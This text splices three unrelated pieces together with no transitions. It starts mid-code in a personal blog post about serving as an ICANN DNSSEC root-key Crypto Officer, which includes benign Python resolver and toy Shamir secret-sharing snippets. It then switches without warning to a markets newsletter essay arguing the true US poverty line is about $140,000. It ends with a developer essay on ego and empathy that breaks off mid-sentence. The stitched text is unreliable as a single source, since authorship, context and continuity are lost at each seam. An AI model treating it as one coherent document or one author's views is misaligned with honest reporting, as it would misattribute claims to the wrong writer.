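    answer = resolver.resolve("icann.org", "A")
    validated = bool(answer.response.flags & dns.flags.AD)   # AD: resolver validated the answer
    print("validated by resolver:", validated)
    for rrset in answer.response.answer:
        print(rrset)                             # A records, plus RRSIGs if the resolver returns them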
David Huberman at ICANN did a splendid slide deck explaining how it all works.
Trust in a system requires more than technical correctness. It
involves trust in the execution of running the system itself. For
that reason ICANN decided that it would build a framework to
facilitate trust and transparency. Among other things it included:
Placing the cryptographic material in two highly secure sites, one near Washington DC and one in Los Angeles (geographic diversity)
Creating a multi-layered security regimen requiring several people to access the Key Management Facility
Storing cryptographic material in offline HSMs which utilize Shamir's Secret Sharing to require a quorum of at least 3 out of 7 Crypto Officers to be present in order to "wake them up" (a toy sketch of the secret-sharing idea follows this list)
Trusted Community Representatives with roles of Crypto Officer and Recovery Key Share Holder
Highly scripted (and therefore auditable) ceremonies surrounding handling the cryptographic material
Live streaming all events
Hosting External Witnesses from the community who have expressed interest in being present for a ceremony in person
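To give a flavor of the 3-of-7 scheme those HSMs rely on, here is a toy Shamir's Secret Sharing sketch in Python; it is purely illustrative and has nothing to do with the actual HSM implementation or parameters. The secret is the constant term of a random degree-2 polynomial over a prime field, each officer holds one point on that polynomial, and any three points reconstruct the secret while fewer reveal nothing.

    # Toy Shamir 3-of-7 secret sharing over a prime field (Python 3.8+ for pow(x, -1, P)).
    # Illustrative only; real deployments use vetted implementations and parameters.
    import random

    P = 2**127 - 1                      # a Mersenne prime, large enough for a demo

    def make_shares(secret: int, k: int = 3, n: int = 7):
        coeffs = [secret] + [random.randrange(P) for _ in range(k - 1)]
        def poly(x: int) -> int:
            return sum(c * pow(x, i, P) for i, c in enumerate(coeffs)) % P
        return [(x, poly(x)) for x in range(1, n + 1)]   # one (x, y) share per officer

    def reconstruct(shares):
        # Lagrange interpolation at x = 0 recovers the constant term (the secret).
        secret = 0
        for i, (xi, yi) in enumerate(shares):
            num, den = 1, 1
            for j, (xj, _) in enumerate(shares):
                if i != j:
                    num = num * (-xj) % P
                    den = den * (xi - xj) % P
            secret = (secret + yi * num * pow(den, -1, P)) % P
        return secret

    secret = random.randrange(P)
    shares = make_shares(secret)
    assert reconstruct(random.sample(shares, 3)) == secret   # any 3 of 7 suffice
    print("recovered with 3 of 7 shares:", reconstruct(shares[:3]) == secret)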
When the call for volunteers to be Trusted Community Representatives
came out, I was no stranger to community involvement, having served
several years on the ARIN Advisory Council and done community work
(and later Board work) for NANOG. I was employed by a Top Level
Domain operator, and submitted my CV and expressed my interest.
That's how I found myself in Culpeper, Virginia in 2010 as Crypto Officer 4 at the
first ceremony for signing the DNSSEC Root. I had no idea that I would still be doing it fifteen years
later. I was the last of the original Crypto Officers for KMF-East, and the
second last overall - outlasted only by Subramanian "SM" Moonesamy, who is Crypto Officer 7 for KMF-West.
It's been an adventure. I've been a small participant in root key
rolls, put in a B-roll appearance on BBC Horizon (S53E13), become
friends with many of the people I served with, overseen ceremonies
remotely during the COVID lockdown, and witnessed an amazing pivot by
ICANN staff who managed to get new HSMs selected, tested, integrated,
and deployed on only 8 months' notice, a feat which I remain in awe
of.
I was an early advocate for improving trust in our process by
leveraging natural turnover and backfilling existing
TCRs with people selected from a broader set of qualified individuals
than just the fellowship of DNS protocol experts, operators, and
developers. I'm grateful that our voices were heard.
On November 13th 2025, I passed the torch to Lodrina Cherne, who is now
Crypto Officer 4 for KMF-East. Lodrina is a security researcher,
an educator with an emphasis on digital forensics, and works in
security engineering at a large cloud provider. I'm honored to have
her as my successor.
I've had several people reach out to me to ask what prompted me to
step back from the ICANN volunteer work. Those who were hoping for
some kind of salacious dirt or scandal were sorely disappointed -
quite the opposite, this is a huge success story and I'm pleased to
have been able to do my small part. A direct cut and paste from Slack
logs with one of them follows:
What led you to step back from ICANN?
Several things:
It was understood to be a 5 year commitment. I've been doing it for more than 15.
It was broadly agreed among the cohort many years ago (over a decade ago) that more people from more diverse backgrounds than just DNS-old-boy-network (which was the original group of TCRs) was a Good Thing.
Many people cycled out earlier; I was happy to let the folks for whom travel was more odious go first. But it's only practical and only really good for the system to cycle out a single TCR per ceremony.
COVID delayed this. Kaminsky's untimely death and subsequent replacement as a recovery key shareholder (RKSH) delayed this.
A further delay was the AEP Keyper HSM getting abruptly EOLed, and the transition to the Thales Luna HSMs. It went off without a hitch after being researched, developed, and executed in 8 months - a record which I stand in awe of and which is a true testament to the skill and commitment of the ICANN PTI team. ICANN expressed the desire for continuity among long-serving COs past that milestone; Frederico Neves (fellow original Crypto Officer) and I were willing to extend our stay for that.
So in short it was time to pass the torch. Everyone has been doing
everything right. I remarked at the end of Ceremony 59 that when we
started doing this 15 years ago, success was not guaranteed; it took
the Kaminsky bug to get us over the line to actually deploy it.
Today, the major Unix DNS resolvers ship with DNSSEC validation
enabled. All of the major public DNS resolvers (Google, Quad9, Cloudflare) do DNSSEC validation. I thanked everyone who has been
responsible for and put their personal credibility on the line for the
security, integrity, and credibility of this process and stated that I
was honored to have been able to play a small part in doing that.
Epilogue:
I won't be participating in most East Coast ceremonies from here on out, but I don't rule out occasionally showing up as an external witness, particularly at KMF-West where I have never visited in person.
Here are scans of our ceremony scripts from both Ceremony 59 and the previous day's administrative ceremonies.
We’re going to largely skip markets again, because the sweater is rapidly unraveling in other areas as I pull on threads. Suffice it to say that the market is LARGELY unfolding as I had expected — credit stress is rising, particularly in the tech sector. Many are now pointing to the rising CDS for Oracle as the deterioration in “AI” balance sheets accelerates. CDS was also JUST introduced for META — it traded at 56, slightly worse than the aggregate IG CDS at 54.5 (itself up from 46 since I began discussing this topic):
Correlations are spiking as MOST stocks move in the same direction each day even as megacap tech continues to define the market aggregates:
Market pricing of correlation is beginning to pick up… remember this is the “real” fear index and the moving averages are trending upwards:
And, as I predicted, inflation concerns, notably absent from any market-based indication, are again freezing the Fed. The pilots are frozen, understanding that they are in Zugzwang — every available move makes things worse.
And so now, let’s tug on that loose thread… I’m sure many of my left-leaning readers will say, “This is obvious, we have been talking about it for YEARS!” Yes, many of you have; but you were using language of emotion (“Pay a living wage!”) rather than showing the math. My bad for not paying closer attention; your bad for not showing your work or coming up with workable solutions. Let’s rectify it rather than cast blame.
I have spent my career distrusting the obvious.
Markets, liquidity, factor models—none of these ever felt self-evident to me. Markets are mechanisms of price clearing. Mechanisms have parameters. Parameters distort outcomes. This is the lens through which I learned to see everything: find the parameter, find the distortion, find the opportunity.
But there was one number I had somehow never interrogated. One number that I simply accepted, the way a child accepts gravity.
The poverty line.
I don’t know why. It seemed apolitical, an actuarial fact calculated by serious people in government offices. A line someone else drew decades ago that we use to define who is “poor,” who is “middle class,” and who deserves help. It was infrastructure—invisible, unquestioned, foundational.
This week, while trying to understand why the American middle class feels poorer each year despite healthy GDP growth and low unemployment, I came across a sentence buried in a research paper:
“The U.S. poverty line is calculated as three times the cost of a minimum food diet in 1963, adjusted for inflation.”
I read it again. Three times the minimum food budget.
I felt sick.
The formula was developed by Mollie Orshansky, an economist at the Social Security Administration. In 1963, she observed that families spent roughly one-third of their income on groceries. Since pricing data was hard to come by for many items (housing, for example), she reasoned that if you could calculate a minimum adequate food budget at the grocery store, you could multiply it by three and establish a poverty line.
Orshansky was careful about what she was measuring. In her January 1965 article, she presented the poverty thresholds as a measure of income
inadequacy
, not income adequacy—”if it is not possible to state unequivocally ‘how much is enough,’ it should be possible to assert with confidence how much, on average, is too little.”
She was drawing a floor. A line below which families were clearly in crisis.
For 1963, that floor made sense. Housing was relatively cheap. A family could rent a decent apartment or buy a home on a single income, as we’ve discussed. Healthcare was provided by employers and cost relatively little (Blue Cross coverage averaged $10/month). Childcare didn’t really exist as a market—mothers stayed home, family helped, or neighbors (who likely had someone home) watched each other’s kids. Cars were affordable, if prone to breakdowns. With few luxury frills, the neighborhood kids in vo-tech could fix most problems when they did. College tuition could be covered with a summer job. Retirement meant a pension income, not a pile of 401(k) assets you had to fund yourself.
Orshansky’s food-times-three formula was crude, but as a
crisis
threshold—a measure of “too little”—it roughly corresponded to reality. A family spending one-third of its income on food would spend the other two-thirds on everything else, and those proportions more or less worked. Below that line, you were in genuine crisis. Above it, you had a fighting chance.
But everything changed between 1963 and 2024.
Housing costs exploded. Healthcare became the largest household expense for many families. Employer coverage shrank while deductibles grew. Childcare became a market, and that market became ruinously expensive. College went from affordable to crippling. Transportation costs rose as cities sprawled and public transit withered under government neglect.
The labor model shifted. A second income became mandatory to maintain the standard of living that one income formerly provided. But a second income meant childcare became mandatory, which meant two cars became mandatory. Or maybe you’d simply be “asking for a lot generationally speaking” because living near your parents helps to defray those childcare costs.
The composition of household spending transformed completely. In 2024, food-at-home is no longer 33% of household spending. For most families, it’s 5 to 7 percent.
Housing now consumes 35 to 45 percent. Healthcare takes 15 to 25 percent. Childcare, for families with young children, can eat 20 to 40 percent.
If you keep Orshansky’s logic—if you maintain her principle that poverty could be defined by the inverse of food’s budget share—but update the food share to reflect today’s reality, the multiplier is no longer three.
It becomes sixteen.
Which means if you measured income inadequacy today the way Orshansky measured it in 1963, the threshold for a family of four wouldn’t be $31,200.
It would be somewhere between $130,000 and $150,000.
And remember: Orshansky was only trying to define “too little.” She was identifying crisis, not sufficiency. If the crisis threshold—the floor below which families cannot function—is honestly updated to current spending patterns, it lands at $140,000.
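For readers who want the arithmetic rather than the rhetoric, here is a minimal sketch of that update. The dollar inputs are assumptions for illustration; the essay never states the minimum food budget directly, but its roughly 16x multiplier and its $130,000 to $150,000 range together imply something like $8,000 to $9,500 a year.

```python
# Back-of-the-envelope version of the updated Orshansky arithmetic.
# The food budgets below are assumptions for illustration, not official statistics.
def orshansky_threshold(min_food_budget: float, food_share: float) -> float:
    """Threshold = minimum food budget divided by food's share of spending."""
    return min_food_budget / food_share

# 1963: food was roughly one third of household spending, so the multiplier
# was 3; a ~$1,040/yr economy food plan gives the era's ~$3,100 line.
print(round(orshansky_threshold(1_040, 1/3)))          # 3120

# 2024: food-at-home runs ~5-7% of spending, a multiplier of ~14-20. With a
# minimum food budget in the $8,000-9,500/yr range (implied by the essay's
# 16x multiplier and its $130k-150k result), the threshold lands here:
for food_budget in (8_000, 9_500):
    for share in (0.05, 1/16, 0.07):
        t = orshansky_threshold(food_budget, share)
        print(f"food ${food_budget:,}/yr, share {share:.1%}: about ${t:,.0f}")
```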
What does that tell you about the $31,200 line we still use?
It tells you we are measuring starvation.
“An imbalance between rich and poor is the oldest and most fatal ailment of all republics.” — Plutarch
The official poverty line for a family of four in 2024 is $31,200. The median household income is roughly $80,000. We have been told, implicitly, that a family earning $80,000 is doing fine—safely above poverty, solidly middle class, perhaps comfortable.
But if Orshansky’s crisis threshold were calculated today using her own methodology, that $80,000 family would be living in deep poverty.
I wanted to see what would happen if I ignored the official stats and simply calculated the cost of existing. I built a Basic Needs budget for a family of four (two earners, two kids). No vacations, no Netflix, no luxury. Just the “Participation Tickets” required to hold a job and raise kids in 2024.
Using conservative, national-average data:
Childcare: $32,773
Housing: $23,267
Food: $14,717
Transportation: $14,828
Healthcare: $10,567
Other essentials: $21,857
Required net income: $118,009
Add federal, state, and FICA taxes of roughly $18,500, and you arrive at a required gross income of $136,500.
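A quick sketch of that tally, using only the line items above (the $18,500 tax figure is the essay's, not an independent tax calculation):

```python
# The Basic Needs budget from above, reproduced as a quick check.
basic_needs = {
    "Childcare":        32_773,
    "Housing":          23_267,
    "Food":             14_717,
    "Transportation":   14_828,
    "Healthcare":       10_567,
    "Other essentials": 21_857,
}

required_net = sum(basic_needs.values())
taxes = 18_500                      # federal + state + FICA, per the essay
required_gross = required_net + taxes

print(required_net)    # 118,009
print(required_gross)  # 136,509, i.e. "roughly $136,500"
```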
This is Orshansky’s “too little” threshold, updated honestly. This is the floor.
The single largest line item isn’t housing. It’s childcare: $32,773.
This is the trap. To reach the median household income of $80,000, most families require two earners. But the moment you add the second earner to chase that income, you trigger the childcare expense.
If one parent stays home, the income drops to $40,000 or $50,000—well below what’s needed to survive. If both parents work to hit $100,000, they hand over $32,000 to a daycare center.
The second earner isn’t working for a vacation or a boat. The second earner is working to pay the stranger watching their children so they can go to work and clear $1-2K extra a month. It’s a closed loop.
Critics will immediately argue that I’m cherry-picking expensive cities. They will say $136,500 is a number for San Francisco or Manhattan, not “Real America.”
So let’s look at “Real America.”
The model above allocates $23,267 per year for housing. That breaks down to $1,938 per month. This is the number that serious economists use to tell you that you’re doing fine.
In my last piece,
Are You An American?
, I analyzed a modest “starter home” which turned out to be in Caldwell, New Jersey—the kind of place a Teamster could afford in 1955. I went to Zillow to see what it costs to live in that same town if you don’t have a down payment and are forced to rent.
There are exactly seven 2-bedroom+ units available in the entire town. The cheapest one rents for $2,715 per month.
That’s a $777 monthly gap between the model and reality. That’s $9,300 a year in post-tax money. To cover that gap, you need to earn an additional $12,000 to $13,000 in gross salary.
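The gross-up behind that last sentence is simple; here is a sketch with the marginal tax rate treated as an assumption (the essay's $12,000 to $13,000 figure implies roughly 25 to 30 percent):

```python
# The Caldwell rent-gap arithmetic. The marginal tax rates are assumptions;
# the essay's "$12,000 to $13,000" implies something in the 25-30% range.
model_rent, market_rent = 1_938, 2_715        # $/month: model vs. cheapest listing
monthly_gap = market_rent - model_rent        # $777
annual_gap = monthly_gap * 12                 # $9,324 of post-tax money

for marginal_rate in (0.25, 0.28, 0.30):
    gross_needed = annual_gap / (1 - marginal_rate)
    print(f"at {marginal_rate:.0%} marginal tax: ${gross_needed:,.0f} extra gross")
# roughly $12,400 to $13,300 of additional gross salary
```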
So when I say the real poverty line is $140,000, I’m being conservative. I’m using optimistic, national-average housing assumptions. If we plug in the actual cost of living in the zip codes where the jobs are—where rent is $2,700, not $1,900—the threshold pushes past $160,000.
The market isn’t just expensive; it’s broken. Seven units available in a town of thousands? That isn’t a market. That’s a shortage masquerading as an auction.
And that $2,715 rent check buys you zero equity. In the 1950s, the monthly housing cost was a forced savings account that built generational wealth. Today, it’s a subscription fee for a roof. You are paying a premium to stand still.
Economists will look at my $140,000 figure and scream about “hedonic adjustments.” Heck, I will scream at you about them. They are valid attempts to measure the improvement in quality that we honestly value.
I will tell you that comparing 1955 to 2024 is unfair because cars today have airbags, homes have air conditioning, and phones are supercomputers. I will argue that because the quality of the good improved, the real price dropped.
And I would be making a category error. We are not calculating the price of luxury. We are calculating the price of participation.
To function in 1955 society—to have a job, call a doctor, and be a citizen—you needed a telephone line. That “Participation Ticket” cost $5 a month.
Adjusted for standard inflation, that $5 should be $58 today.
But you cannot run a household in 2024 on a $58 landline. To function today—to factor authenticate your bank account, to answer work emails, to check your child’s school portal (which is now digital-only)—you need a smartphone plan and home broadband.
The cost of that “Participation Ticket” for a family of four is not $58. It’s $200 a month.
The economists say, “But look at the computing power you get!”
I say, “Look at the computing power I
need
!”
The utility I’m buying is “connection to the economy.” The price of that utility didn’t just keep pace with inflation; it tripled relative to it.
I ran this “Participation Audit” across the entire 1955 budget. I didn’t ask “is the car better?” I asked “what does it cost to get to work?”
Healthcare: In 1955, Blue Cross family coverage was roughly $10/month ($115 in today’s dollars). Today, the average family premium is over $1,600/month. That’s 14x inflation.
Taxes (FICA): In 1955, the Social Security tax was 2.0% on the first $4,200 of income. The maximum annual contribution was $84. Adjusted for inflation, that’s about $960 a year. Today, a family earning the median $80,000 pays over $6,100. That’s 6x inflation.
Childcare: In 1955, this cost was zero because the economy supported a single-earner model. Today, it’s $32,000. That’s an infinite increase in the cost of participation.
The only thing that actually tracked official CPI was… food. Everything else—the inescapable fees required to hold a job, stay healthy, and raise children—inflated at multiples of the official rate when considered on a participation basis. YES, these goods and services are BETTER. I would not trade my 65” 4K TV mounted flat on the wall for a 25” CRT dominating my living room; but I don’t have a choice, either.
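Here is that audit reduced to ratios, using only the figures quoted above; the CPI-adjusted values are the essay's, which embed roughly an 11 to 12 times general price increase since 1955:

```python
# The "Participation Audit" as ratios: today's actual cost of each ticket
# divided by what the 1955 price would be had it merely tracked CPI.
# All three rows use the essay's own figures.
tickets = {
    #                     1955 cost, CPI-adjusted today, actual today
    "Connectivity ($/mo)": (5,    58,    200),    # landline -> smartphone plans + broadband
    "Healthcare ($/mo)":   (10,   115,   1_600),  # Blue Cross family premium -> avg family premium
    "FICA ($/yr)":         (84,   960,   6_100),  # 1955 max contribution -> median-family bill
}

for name, (_cost_1955, cpi_adjusted, actual) in tickets.items():
    print(f"{name}: {actual / cpi_adjusted:.1f}x the official-inflation price")
# Connectivity ~3.4x, Healthcare ~13.9x, FICA ~6.4x
```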
Once I established that $136,500 is the real break-even point, I ran the numbers on what happens to a family climbing the ladder toward that number.
What I found explains the “vibes” of the economy better than any CPI print.
Our entire safety net is designed to catch people at the very bottom, but it sets a trap for anyone trying to climb out. As income rises from $40,000 to $100,000, benefits disappear faster than wages increase.
I call this The Valley of Death.
Let’s look at the transition for a family in New Jersey:
1. The View from $35,000 (The “Official” Poor)
At this income, the family is struggling, but the state provides a floor. They qualify for Medicaid (free healthcare). They receive SNAP (food stamps). They receive heavy childcare subsidies. Their deficits are real, but capped.
2. The Cliff at $45,000 (The Healthcare Trap)
The family earns a $10,000 raise. Good news? No. At this level, the parents lose Medicaid eligibility. Suddenly, they must pay premiums and deductibles.
Income Gain: +$10,000
Expense Increase: +$10,567
Net Result: They are poorer than before. The effective tax on this mobility is over 100%.
3. The Cliff at $65,000 (The Childcare Trap)
This is the breaker. The family works harder. They get promoted to $65,000. They are now solidly “Working Class.”
But at roughly this level, childcare subsidies vanish. They must now pay the full market rate for daycare.
Income Gain: +$20,000 (from $45k)
Expense Increase: +$28,000 (jumping from co-pays to full tuition)
Net Result: Total collapse.
When you run the net-income numbers, a family earning $100,000 is effectively in a worse monthly financial position than a family earning $40,000.
At $40,000, you are drowning, but the state gives you a life vest. At $100,000, you are drowning, but the state says you are a “high earner” and ties an anchor to your ankle called “Market Price.”
In option terms, the government has sold a call option to the poor, but they’ve rigged the gamma. As you move “closer to the money” (self-sufficiency), the delta collapses. For every dollar of effort you put in, the system confiscates 70 to 100 cents.
No rational trader would take that trade. Yet we wonder why labor force participation lags. It’s not a mystery. It’s math.
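Here is the math, using only the cliff numbers described above:

```python
# The two cliffs above, expressed as effective tax rates on the raise
# (benefit losses counted as new out-of-pocket expenses).
cliffs = [
    # (label,                         income gain, new expenses triggered)
    ("Medicaid cliff, $35k -> $45k",  10_000,      10_567),
    ("Childcare cliff, $45k -> $65k", 20_000,      28_000),
]

for label, gain, new_costs in cliffs:
    print(f"{label}: {new_costs / gain:.0%} effective tax on the raise")
# ~106% and ~140%: each raise leaves the family worse off than before
```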
The most dangerous lie of modern economics is “Mean Reversion.” Economists assume that if a family falls into debt or bankruptcy, they can simply save their way back to the average.
They are confusing Volatility with Ruin.
Falling below the line isn’t like cooling water; it’s like freezing it. It is a Phase Change.
When a family hits the barrier—eviction, bankruptcy, or default—they don’t just have “less money.” They become Economically Inert.
They are barred from the credit system (often for 7–10 years).
They are barred from the prime rental market (landlord screens).
They are barred from employment in sensitive sectors.
In physics, it takes massive “Latent Heat” to turn ice back into water. In economics, the energy required to reverse a bankruptcy is exponentially higher than the energy required to pay a bill.
The $140,000 line matters because it is the buffer against this Phase Change. If you are earning $80,000 with $79,000 in fixed costs, you are not stable. You are super-cooled water. One shock—a transmission failure, a broken arm—and you freeze instantly.
If you need proof that the cost of participating, the cost of
working,
is the primary driver of this fragility, look at the Covid lockdowns.
In April 2020, the US personal savings rate hit a historic 33%. Economists attributed this to stimulus checks. But the math tells a different story.
During lockdown, the “Valley of Death” was temporarily filled.
Childcare ($32k): Suspended. Kids were home.
Commuting ($15k): Suspended.
Work Lunches/Clothes ($5k): Suspended.
For a median family, the “Cost of Participation” in the economy is roughly $50,000 a year. When the economy stopped, that tax was repealed. Families earning $80,000 suddenly felt rich—not because they earned more, but because the leak in the bucket was plugged. For many, income actually rose thanks to the $600/week unemployment boost. But even for those whose income stayed flat, they felt rich because many costs were avoided.
When the world reopened, the costs returned, but now inflated by 20%. The rage we feel today is the hangover from that brief moment where the American Option was momentarily back in the money. Those with formal training in economics have dismissed these concerns, by and large. “Inflation” is the rate of change in the price level; these poor, deluded souls were outraged at the price LEVEL. Tut, tut… can’t have deflation now, can we? We promise you will like THAT even less.
But the price level does mean something, too. If you are below the ACTUAL poverty line, you are suffering constant deprivation; and a higher price level means you get even less in aggregate.
You load sixteen tons, what do you get?
Another day older and deeper in debt
Saint Peter, don’t you call me, ‘cause I can’t go
I owe my soul to the company store — Merle Travis, 1946
This mathematical valley explains the rage we see in the American electorate, specifically the animosity the “working poor” (the middle class) feel toward the “actual poor” and immigrants.
Economists and politicians look at this anger and call it racism, or lack of empathy. They are missing the mechanism.
Altruism is a function of surplus. It is easy to be charitable when you have excess capacity. It is impossible to be charitable when you are fighting for the last bruised banana.
The family earning $65,000—the family that just lost their subsidies and is paying $32,000 for daycare and $12,000 for healthcare deductibles—is hyper-aware of the family earning $30,000 and getting subsidized food, rent, childcare, and healthcare.
They see the neighbor at the grocery store using an EBT card while they put items back on the shelf. They see the immigrant family receiving emergency housing support while they face eviction.
They are not seeing “poverty.” They are seeing people getting for free the exact things that they are working 60 hours a week to barely afford. And even worse, even if THEY don’t see these things first hand… they are being shown them:
The anger isn’t about the goods. It’s about the breach of contract. The American Deal was that Effort ~ Security. Effort brought your Hope strike closer. But because the real poverty line is $140,000, effort no longer yields security or progress; it brings risk, exhaustion, and debt.
When you are drowning, and you see the lifeguard throw a life vest to the person treading water next to you—a person who isn’t swimming as hard as you are—you don’t feel happiness for them. You feel a homicidal rage at the lifeguard.
We have created a system where the only way to survive is to be destitute enough to qualify for aid, or rich enough to ignore the cost. Everyone in the middle is being cannibalized. The rich know this… and they are increasingly opting out of the shared spaces:
If you need visual proof of this benchmark error, look at the charts that economists love to share on social media to prove that “vibes” are wrong and the economy is great.
You’ve likely seen this chart. It shows that the American middle class is shrinking not because people are getting poorer, but because they’re “moving up” into the $150,000+ bracket.
The economists look at this and cheer. “Look!” they say. “In 1967, only 5% of families made over $150,000 (adjusted for inflation). Now, 34% do! We are a nation of rising aristocrats.”
But look at that chart through the lens of the real poverty line.
If the cost of basic self-sufficiency for a family of four—housing, childcare, healthcare, transportation—is $140,000, then that top light-blue tier isn’t “Upper Class.”
It’s the Survival Line.
This chart doesn’t show that 34% of Americans are rich. It shows that only 34% of Americans have managed to escape deprivation. It shows that the “Middle Class” (the dark blue section between $50,000 and $150,000)—roughly 45% of the country—is actually the Working Poor. These are the families earning enough to lose their benefits but not enough to pay for childcare and rent. They are the ones trapped in the Valley of Death.
But the commentary tells us something different:
“Americans earned more for several reasons. The first is that neoliberal economic policies worked as intended. In the last 50 years, there have been big increases in productivity, solid GDP growth and, since the 1980s, low and predictable inflation. All this helped make most Americans richer.”
“neoliberal economic policies worked as intended” — read that again. With POSIWID (the purpose of a system is what it does) in mind.
The chart isn’t measuring prosperity. It’s measuring inflation in the non-discretionary basket. It tells us that to live a 1967 middle-class life in 2024, you need a “wealthy” income.
And then there’s this chart, the shield used by every defender of the status quo:
Poverty has collapsed to 11%. The policies worked as intended!
But remember Mollie Orshansky. This chart is measuring the percentage of Americans who cannot afford a minimum food diet multiplied by three.
It’s not measuring who can afford rent (which is up 4x relative to wages). It’s not measuring who can afford childcare (which is up infinite percent). It’s measuring starvation.
Of course the line is going down. We are an agricultural superpower that opened its markets to even cheaper foreign food. Shrimp from Vietnam, tilapia from… don’t ask. Food is cheap. But life is expensive.
When you see these charts, don’t let them gaslight you. They are using broken rulers to measure a broken house. The top chart proves that you need $150,000 to make it. The bottom chart proves they refuse to admit it.
So that’s the trap. The real poverty line—the threshold where a family can afford housing, healthcare, childcare, and transportation without relying on means-tested benefits—isn’t $31,200.
It’s ~$140,000.
Most of my readers will have cleared this threshold. My parents never really did, but I was born lucky — brains, beauty (in the eye of the beholder admittedly), height (it really does help), parents that encouraged and sacrificed for education (even as the stress of those sacrifices eventually drove my mother clinically insane), and an American citizenship. But most of my readers are now seeing this trap for their children.
And the system is designed to prevent them from escaping. Every dollar you earn climbing from $40,000 to $100,000 triggers benefit losses that exceed your income gains. You are literally poorer for working harder.
The economists will tell you this is fine because you’re building wealth. Your 401(k) is growing. Your home equity is rising. You’re richer than you feel.
Next week, I’ll show you why that’s wrong. And THEN we can start the discussion of how to rebuild. Because we can.
The wealth you’re counting on—the retirement accounts, the home equity, the “nest egg” that’s supposed to make this all worthwhile—is just as fake as the poverty line. But the humans behind that wealth are real. And they are amazing.
A Unified Theory of Ego, Empathy, and Humility at Work
In our daily lives empathy and humility are obvious virtues we aspire to. They keep our egos in check. Less obvious is that they’re practical skills in the workplace, too. I think, for developers and technical leaders in particular, that the absence of ego is the best way to further our careers and do great work.
In
the simplest of terms
the ego is the characteristic of personhood that enables us to practice self-reflection, self-awareness, and accountability for the actions or decisions we take.
However, the ego also motivates us to reframe our perception of the world in whatever way keeps us centered in it. Each of us is perpetually driven to justify our place in the world. This
constant self-justification
is like an engine that idles for our entire lives, and it requires constant fine-tuning. When it runs amok this is what we call a “big” ego.
Breaking News! Developers Have Egos!
I’m not thinking only of the 10x engineer stereotype, although I’ve worked with such folks in the past. Ego is more nuanced than that. Besides the most arrogant developer in the room throwing their weight around, our egos manifest in hundreds of ways that are much harder to detect.
As developers we’re more susceptible to letting our egos run free. The nature of our work is so technical that to others it can seem obscure, arcane, or even magical. Sometimes we don’t do enough to actively dispel that notion—and just like that half the work of self-justification is already done for us.
Very often it’s not intentional. The simplest example is the overuse of jargon and acronyms. We all do it, but as
Jeremy Keith explains
:
Still, I get why initialisms run rampant in technical discussions. You can be sure that most discussions of particle physics would be incomprehensible to outsiders, not necessarily because of the concepts, but because of the terminology.
Simply mashing a few letters together can be empowering for ourselves while being exclusionary for others. It’s an artifact—albeit a small one—of our egos. We know what the technobabble means. Our justified place in the universe is maintained.
Sometimes we express our egos more deliberately. Developers have a clear tendency towards gatekeeping. For most, it’s an honest mistake. There’s a fine line between holding others to a certain expectation versus actively keeping people on the outside. When we see ourselves doing this we can correct it easily enough.
Sadly there are developers who seemingly like to gatekeep. They get to feel like wizards in their towers with their dusty books and potions. But, it’s actually self-limiting. Gatekeeping by definition means you’re fixed in place and never moving, standing guard for eternity.
My point is that our egos can “leak” in so many ways that it takes diligence to catch it, let alone correct it. The following is a short, incomplete list of typical statements we as developers might say or hear at work. If you parse them more precisely, each one is an attempt at self-justification:
“That’s the way we’ve always done it.”
“It’s not that complicated! You just…”
“Yeah, I should be able to finish this in a day.”
“This legacy codebase is an absolute disaster.”
“Assign it to me. Nobody else will be able to fix it.”
“You can’t be a senior dev. You don’t know anything about…”
“Ugh, our morning standup is so useless.”
“This feature is too important to assign to the junior dev.”
“We should start using this new tool in our pipeline.”
“We should never use that new tool in our pipeline.”
Everything Is Bigger Than You
The ego is concerned with the self but very easily becomes something harmful in the absence of new information or context. Indeed, the ego nudges us to self-justify so much that one could argue it actively
resists
new information when left unchecked.
You may have read one of the example statements above with some familiarity and thought, “But what if I’m right?”
To which I’d say: OK, but should that be your default stance? Why might you feel the need to immediately start a conversation with a self-justification? There are ways to adjust our approach, make our points, and accept new information all at the same time.
In any interaction—be it a meeting, Slack thread, or water cooler conversation—we must remember that
the matter at hand is bigger than us in ways we don’t yet understand
.
To make these concepts more actionable I find it simpler to define them in terms of the purposes they serve. Specifically…
Empathy is how we
gather new information
.
Humility is how we
allow information to change our behavior
.
This framing also helps remind us what empathy and humility
are not
. It’s not about putting yourself in another’s shoes, as the saying goes. It’s not about being submissive or a pushover. It’s not about altruism or self-sacrifice. We can easily practice empathy and humility without it ever being at our own expense.
The Pursuit Of Information
I don’t know about you but I go to work to solve problems, be creative, and build shit. I can’t think of a single instance where an unruly ego solved anything I’ve worked on. Ego just makes an existing challenge worse. Solutions require information I don’t have yet.
Empathy and humility are usually top of mind during situations of pain or distress, but they’re really aspects of emotional intelligence that should be activated at all times. Once you adjust your mindset to treat them as basic tools for the
pursuit of information
you’ll see opportunities to leverage them everywhere.
Developers can apply this mindset with almost anybody they come into contact with. Fellow developers, naturally. But also less technical teammates (e.g., QAs, designers, product owners, stakeholders) who have their own unique skills and context that our success depends on. And of course our users should be at the center of every problem we’re working to solve. Lastly, even executives and upper management have some insight to offer if you dare (
but only up to a certain point
).
“Be Curious, Not Judgmental”
I’ve been waiting years for a chance to work
Ted Lasso
into one of my essays. Today’s the day, readers.
The titular character is such an archetype for leadership that my jaw hit the floor when I first watched the show. The example Ted sets has spawned
countless think pieces about leadership and management
. Suffice it to say he exhibits all of my principles over the series’ 34 episodes. He’s empathy and humility sporting a mustache. He’s the absence of ego personified.
I highly recommend watching the show but to get a taste this 5 minute clip is worth your time. This is the famous “darts scene”…
There’s a common and derisive attitude that qualities like empathy or humility are signs of weakness. You have to get all up in your feelings. Ew! But they require enormous reserves of strength, patience, and determination. It’s those who follow their egos who are weak.
Letting your ego take control is the easiest thing in the world. Just ask any toddler throwing a temper tantrum. Resisting those impulses and remaining calm, on the other hand, has been a virtue humanity has aspired to for thousands of years. As the Roman emperor and
Stoic
philosopher
Marcus Aurelius
wrote: “The nearer a man comes to a calm mind, the closer he is to strength.”
You’re Neither Ted Lasso Nor A Roman Emperor
The practice of empathy, humility, and keeping your ego in check will
test you daily
. The feedback I’ve received the most from my coworkers is that I’m extraordinarily calm and even-keeled in any situation—even situations where I’d be right to freak out.
Is that just naturally my personality? Maybe in part, but
remaining calm is a choice
. I’m actively choosing to favor solutions over my own ego. To my colleagues past and present I confess to you now that any time you’ve seen me calm, cool, and collected I was very likely
internally screaming
.
If this sounds like a lot of work you might be wondering if it’s worth it. I think it is. At the very least your coworkers and colleagues will like you better. That’s no small thing.
In all seriousness, the positive feedback I get most about the developers I manage is when they’ve demonstrated empathy and humility while dialing back their egos. This is because they’re people we can work with—literally. Nobody wants to work with a narcissist or a rock star. Nobody is materially impressed by
